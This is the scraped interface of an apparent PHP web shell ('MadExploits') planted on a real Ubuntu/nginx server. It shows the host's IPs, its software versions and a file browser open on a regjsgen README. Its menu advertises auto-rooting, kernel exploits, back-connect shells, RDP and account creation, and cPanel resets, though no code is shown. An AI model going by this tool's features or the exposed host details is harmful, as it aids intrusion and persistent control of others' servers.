Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
regjsgen /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
1.08
KB
-rw-r--r--
README.md
917
B
-rw-r--r--
package.json
1.69
KB
-rw-r--r--
regjsgen.js
10.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# regjsgen [](https://travis-ci.org/bnjmnt4n/regjsgen) [](https://codecov.io/gh/bnjmnt4n/regjsgen) Generate regular expressions from [regjsparser](https://github.com/jviereck/regjsparser)’s AST. ## Installation ```bash npm install --save regjsgen ``` ## API ### `regjsgen.generate(ast)` This function accepts an abstract syntax tree representing a regular expression, and returns the generated regular expression string. ```js var regjsparser = require('regjsparser'); var regjsgen = require('regjsgen'); // Generate an AST with `regjsparser`. var ast = regjsparser.parse(regex); // Modify AST // … // Generate `RegExp` string with `regjsgen`. regex = regjsgen.generate(ast); ``` ## Support Tested in Node.js 0.10, 0.12, 4, 6 and 8.
Close